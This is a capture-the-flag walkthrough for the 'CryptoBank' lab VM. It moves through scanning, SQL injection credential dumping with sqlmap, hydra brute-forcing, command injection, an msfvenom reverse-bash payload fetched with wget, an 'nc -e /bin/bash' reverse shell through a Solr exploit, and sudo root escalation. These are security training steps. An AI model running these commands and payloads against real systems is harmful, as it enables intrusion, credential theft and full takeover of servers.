Welcome to CryptoBank, the best Crypto platform to store and trade your crypto assets, join now! Our platform uses advanced technology to protect your assets. Our experienced engineers have taken extra measures to keep our infrastructure secure.
Goal: Hack the CryptoBank in order to reach their cold Bitcoin wallet (root flag)
1. Reconnaissance
Scanning the network to find vulnerable machine's IP
We find the IP of the vulnerable machine to be 192.168.10.24
Adding the hostname cryptobank.local (which can be found out by accessing the webpage and proceeding to the secure login page which shows an error as the host name was not resolved) to the /etc/hosts file for resolving the IP address
2. Scanning
2.1 Nmap
Using nmap to find the open ports and their services
nmap -sV -Pn -p- -A -oA nmap/inital 192.168.10.24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-12 09:49 IST
Nmap scan report for 192.168.10.24
Host is up (0.040s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7f:4e:59:df:b7:55:49:cf:d3:12:2d:19:01:05:43:f7 (RSA)
| 256 5e:1b:37:98:ab:c7:e6:ee:5f:f8:df:43:14:de:28:4e (ECDSA)
|_ 256 8e:a9:90:9f:6e:51:b1:c7:26:ea:07:ac:69:28:b3:1c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: CryptoBank
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:26:22:ED (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 39.51 ms 192.168.10.24
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.50 seconds
We find tcp ports 22 and 80 open with ssh and Apache running respectively.
In order to access this page, we need to be authenticated
/trade
We see a login page for a trading platform
2.3 Vulnerability scanning
Using nikto to scan for any vulnerable or exposed critical information
nikto -url http://192.168.10.24
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.10.24
+ Target Hostname: 192.168.10.24
+ Target Port: 80
+ Start Time: 2022-04-12 10:00:49 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 82f7, size: 5a30acd90b6ab, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnakes list (https://gist.github.com/mubix/5d269c686584875015a2)
+ 8260 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2022-04-12 10:03:19 (GMT5.5) (150 seconds)
---------------------------------------------------------------------------
We find a info.php page which contains the details about the php version used, which is always good to know.
2.4 SQL injection vulnerability
We can use burpsuite pro to crawl and scan cryptobank.local/trade to find any vulnerabilities
We find out that the login page is vulnerable to SQL Injection
We need to capture the login request in burpsuite and save it as a text file request.txt for later enumerations using sqlmap
2.5 Credential dumping
Since we found out that cryptobank.local/trade is vulnerable to SQL Injection, we can use sql map to dump out potential credentials
Getting the database names:
sqlmap -r request.txt --dbs --batch
[*] starting @ 10:35:58 /2022-04-12/
---
Parameter: user (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user=1' AND (SELECT 6771 FROM (SELECT(SLEEP(5)))jfIZ) AND 'gLwy'='gLwy&pass=1&login=Login
---
[10:36:33] [INFO] the back-end DBMS is MySQL
[10:36:33] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[10:36:33] [INFO] fetching database names
[10:36:33] [INFO] fetching number of databases
[10:36:33] [INFO] retrieved:
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
5
[10:36:44] [INFO] retrieved:
[10:36:49] [INFO] adjusting time delay to 1 second due to good response times
information_schema
[10:37:52] [INFO] retrieved: cryptobank
[10:38:29] [INFO] retrieved: mysql
[10:38:47] [INFO] retrieved: performanceU
[10:39:31] [INFO] retrieved:
[10:39:31] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
available databases [4]:
[*] cryptobank
[*] information_schema
[*] mysql
[*] performanceU
We get 4 databases cryptobank, information_schema, mysql and performanceU
Out of these the most interesting and potential database for credentials is cryptobank
Dumping the tables in cryptobank:
sqlmap -r request.txt -D cryptobank --tables --batch
---
Parameter: user (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user=1' AND (SELECT 6771 FROM (SELECT(SLEEP(5)))jfIZ) AND 'gLwy'='gLwy&pass=1&login=Login
---
[10:41:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[10:41:43] [INFO] fetching tables for database: 'cryptobank'
[10:41:43] [INFO] fetching number of tables for database 'cryptobank'
[10:41:43] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[10:41:45] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[10:42:00] [INFO] adjusting time delay to 1 second due to good response times
3
[10:42:00] [INFO] retrieved: accounts
[10:42:29] [INFO] retrieved: comments
[10:42:57] [INFO] retrieved: loans
Database: cryptobank
[3 tables]
+----------+
| accounts |
| comments |
| loans |
+----------+
We get tablenames of accounts, comments and loans , out of which accounts might carry potential credentials
Getting the columns from the table accounts
sqlmap -r request.txt -T accounts -D cryptobank --columns --batch
Parameter: user (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user=1' AND (SELECT 6771 FROM (SELECT(SLEEP(5)))jfIZ) AND 'gLwy'='gLwy&pass=1&login=Login
---
[10:45:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[10:45:16] [INFO] fetching columns for table 'accounts' in database 'cryptobank'
[10:45:16] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
===================================================================================
Database: cryptobank
Table: accounts
[4 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| balance | int(11) |
| id_account | int(11) |
| password | varchar(100) |
| username | varchar(50) |
+------------+--------------+
We get 4 columns : balance, id_account, password and username
Dumping the data from columns username and password
sqlmap -r request.txt -T accounts -D cryptobank -C username,password --dump 4m 12s root@j0zack
---
Parameter: user (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user=1' AND (SELECT 6771 FROM (SELECT(SLEEP(5)))jfIZ) AND 'gLwy'='gLwy&pass=1&login=Login
---
[10:51:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[10:51:04] [INFO] fetching entries of column(s) 'password,username' for table 'accounts' in database 'cryptobank'
[10:51:04] [INFO] fetching number of column(s) 'password,username' entries for table 'accounts' in database 'cryptobank'
[10:51:04] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[10:51:06] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
1
===================================================================================
Database: cryptobank
Table: accounts
[12 entries]
+--------------------+------------+
| username | password |
+--------------------+------------+
| spongebob | 3mwZd896Me |
| bill.w | 3Nrc2FYJMe |
| deadbeef | 6X7DnLF5pG |
| dreadpirateroberts | 7HwAEChFP9 |
| notanirsagent | 8hPx2Zqn4b |
| williamdelisle | gFG7pqE5cn |
| buzzlightyear | LnBHvEhmw3 |
| mrbitcoin | LxZjkK87nu |
| johndl33t | NqRF4W85yf |
| juliusthedeveloper | wJWm4CgV26 |
| patric | x8CRvHqgPp |
| tim | zm2gBcaxd3 |
+--------------------+------------+
Saving the usernames and password in files users.txt and passwords.txt respectively
On further exploration of the webpage cryptobank.local, we get more potential usernames from under the core team by clicking on the email icon below the team members. Adding these to users.txt too.
2.6 Brute-forcing login credentials
Using hydra and the obtained credentials to brute-force the /development login portal.
hydra -L users.txt -P passwords.txt http-get://192.168.10.24/development
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-12 11:01:29
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:4/p:1), ~1 try per task
[DATA] attacking http-get://192.168.10.24:80/development
[80][http-get] host: 192.168.10.24 login: julius.b password: wJWm4CgV26
1 of 1 target successfully completed, 1 valid password found
We get the credentials julius.b : wJWm4CgV26
2.7 Recursive directory scanning
We can use dirb to recursively find any directories under /development. Since it requires authentication, we need to pass in the credentials along with it.
dirb http://192.168.10.24/development -u julius.b:wJWm4CgV26 /usr/share/wordlists/dirb/common.txt -w
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Apr 12 19:10:29 2022
URL_BASE: http://192.168.10.24/development/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
AUTHORIZATION: julius.b:wJWm4CgV26
OPTION: Not Stopping on warning messages
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.10.24/development/ ----
==> DIRECTORY: http://192.168.10.24/development/backups/
+ http://192.168.10.24/development/index.html (CODE:200|SIZE:21)
+ http://192.168.10.24/development/php.ini (CODE:200|SIZE:109)
==> DIRECTORY: http://192.168.10.24/development/tools/
---- Entering directory: http://192.168.10.24/development/backups/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
+ http://192.168.10.24/development/backups/.htaccess (CODE:200|SIZE:12)
==> DIRECTORY: http://192.168.10.24/development/backups/home/
---- Entering directory: http://192.168.10.24/development/tools/ ----
+ http://192.168.10.24/development/tools/index.php (CODE:403|SIZE:688)
==> DIRECTORY: http://192.168.10.24/development/tools/Resources/
---- Entering directory: http://192.168.10.24/development/backups/home/ ----
+ http://192.168.10.24/development/backups/home/.git/HEAD (CODE:200|SIZE:23)
+ http://192.168.10.24/development/backups/home/.htaccess (CODE:200|SIZE:12)
==> DIRECTORY: http://192.168.10.24/development/backups/home/assets/
==> DIRECTORY: http://192.168.10.24/development/backups/home/development/
+ http://192.168.10.24/development/backups/home/index.html (CODE:200|SIZE:33603)
==> DIRECTORY: http://192.168.10.24/development/backups/home/trade/
---- Entering directory: http://192.168.10.24/development/tools/Resources/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.10.24/development/backups/home/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
==> DIRECTORY: http://192.168.10.24/development/backups/home/assets/css/
==> DIRECTORY: http://192.168.10.24/development/backups/home/assets/fonts/
==> DIRECTORY: http://192.168.10.24/development/backups/home/assets/img/
==> DIRECTORY: http://192.168.10.24/development/backups/home/assets/js/
---- Entering directory: http://192.168.10.24/development/backups/home/development/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
+ http://192.168.10.24/development/backups/home/development/.htaccess (CODE:200|SIZE:154)
+ http://192.168.10.24/development/backups/home/development/php.ini (CODE:200|SIZE:109)
==> DIRECTORY: http://192.168.10.24/development/backups/home/development/tools/
---- Entering directory: http://192.168.10.24/development/backups/home/trade/ ----
+ http://192.168.10.24/development/backups/home/trade/index.php (CODE:403|SIZE:688)
---- Entering directory: http://192.168.10.24/development/backups/home/assets/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.10.24/development/backups/home/assets/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.10.24/development/backups/home/assets/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.10.24/development/backups/home/assets/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.10.24/development/backups/home/development/tools/ ----
+ http://192.168.10.24/development/backups/home/development/tools/index.php (CODE:403|SIZE:688)
==> DIRECTORY: http://192.168.10.24/development/backups/home/development/tools/Resources/
---- Entering directory: http://192.168.10.24/development/backups/home/development/tools/Resources/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
sources/zt
-----------------
END_TIME: Tue Apr 12 19:12:35 2022
DOWNLOADED: 64568 - FOUND: 11
Reading out the contents of development/backups/home/development/php.ini, we can see that there is a firewall called NinjaFirewall active, which might block out potential reverse shell uploads. We need to find some way to execute commands directly.
We get a directory called .git under /development/backups/home which could be a copy of the git repository and might contain potential vectors.
2.8 Rebuiding git
Cloning it from its GitHub repository and executing the command with the /.git path specified
git clone https://github.com/lijiejie/GitHack
cd GitHack
python3 GitHack.py http://192.168.10.24/development/backups/home/.git/
Searching for any interesting files in the git folder
ls
192.168.10.24 GitHack.py index lib README.md
cd 192.168.10.24
ls
assets closed.html development dev-notes.txt index.html index.js ninjacheck.php ninjafirewall style.css trade
cd development
ls
php.ini tools
cd tools
ls
CommandExecution FileInclusion FileUpload homepage.html index.php Resources
cd CommandExecution ls
commandexec.html CommandExec.php
We get a file named CommandExec.php which contains the login configuration
As we can see from the above code, the username field in the /development/tools/CommandExecution/CommandExec.php is vulnerable to command injection when validated with the same password, wJWm4CgV26
3. Initial Foothold
Navigating to the homepage of /tools(http://cryptobank.local/development/tools/homepage.html), we can see three useful sections.
Since there is a firewall sitting in front of the network, the most probable way of getting a reverse shell would be command execution.We proceed with Execute a command
Using Run system command option
Testing the vulnerability by inputting ls(or any other command with a visible output) in the username field and the password wJWm4CgV26
We find that we can execute commands in the Username field
3.1 Crafting payload
Crafting a bash reverse shell using msfvenom and the payload cmd/unix/reverse_bash and saving it as reverse.sh
msfvenom -p cmd/unix/reverse_bash LHOST=HOSTIP LPORT=4444 R> reverse.sh
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 77 bytes
Hosting the payload localy using a python server
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Uploading the payload to the target by wget http://HOSTIP:8000/reverse.sh in the Username field
3.2 Reverse shell
Firing up msfconsole and setting the module to exploit/multi/handler to capture our reverse shell.
Setting the payload to cmd/unix/reverse_bash the same one which we used to craft the payload with msfvenom
Changing the LHOST and LPORT (default is 4444) and running it
msfconsole
[msf](Jobs:0 Agents:0) >> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set LHOST eth0
LHOST => eth0
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> run
[*] Started reverse TCP handler on 192.168.10.22:4444
Since we already uploaded the payload to the target, we need to run it.
Executing the payload by running bash reverse.sh
We get an open metasploit command shell.
[*] Command shell session 1 opened (192.168.10.22:4444 -> 192.168.10.24:50118 ) at 2022-04-13 10:21:54 +0530
whoami
www-data
We are the user www-data
Backgrounding our session using Ctrl + Z to session 1
Stabilizing the shell to a meterpreter shell by using sessions -u 1
Getting a meterpreter stable shell on session 2, using it by sessions -i 2
^Z
Background session 1? [y/N] y
[msf](Jobs:0 Agents:1) exploit(multi/handler) >> sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.10.22:4433
[*] Sending stage (989032 bytes) to 192.168.10.24
[*] Meterpreter session 2 opened (192.168.10.22:4433 -> 192.168.10.24:57458 ) at 2022-04-13 10:22:20 +0530
[*] Command stager progress: 100.00% (773/773 bytes)
[msf](Jobs:0 Agents:2) exploit(multi/handler) >> sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.168.10.22:4444 -> 192.168.10.24:50118 (192.168.10.24)
2 meterpreter x86/linux www-data @ 192.168.10.24 192.168.10.22:4433 -> 192.168.10.24:57458 (192.168.10.24)
[msf](Jobs:0 Agents:2) exploit(multi/handler) >> sessions -i 2
[*] Starting interaction with 2...
(Meterpreter 2)(/var/www/cryptobank/development/tools/CommandExecution) >
4. Pivoting
After gaining the meterpreter session, we can run netstat to discover any other connections to the application.
Starting a netcat listener in port 7777 in a new terminal window
nc -lvnp 7777
listening on [any] 7777 ...
Executing the exploit with the proper syntax provided with the IP address and port from which Apache solar service is running and using netcat for a reverse connection
www-data@cryptobank:/tmp$ python3 47572.py 172.17.0.1 8983 "nc -e /bin/bash 192.168.10.22 7777"
<72.17.0.1 8983 "nc -e /bin/bash 192.168.10.22 7777"
OS Realese: Linux, OS Version: 4.15.0-175-generic
if remote exec failed, you should change your command with right os platform
Init node cryptobank Successfully, exec command=nc -e /bin/bash 192.168.10.22 7777
RCE failed @Apache Solr node cryptobank
www-data@cryptobank:/tmp$
We get a connection to our listener; stabilizing the shell.
#nc -lvnp 7777
#listening on [any] 7777 ...
connect to [192.168.10.22] from (UNKNOWN) [192.168.10.24] 44906
python -c 'import pty;pty.spawn("/bin/bash")'
solr@33fa86e6105f:/opt/solr/server$
5. Privilege Escalation
Using sudo -l, we find out that user solr can run all commands as root
solr@33fa86e6105f:/opt/solr/server$ sudo -l
Matching Defaults entries for solr on 33fa86e6105f:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User solr may run the following commands on 33fa86e6105f:
(ALL) NOPASSWD: ALL
(ALL : ALL) ALL
Escalating the privilege (using the default password of solr) and getting the flag.txt located at /root
solr@33fa86e6105f:/opt/solr/server$ sudo su
[sudo] password for solr: solr
root@33fa86e6105f:/opt/solr-8.1.1/server cd /root
root@33fa86e6105f:~ cat flag.txt
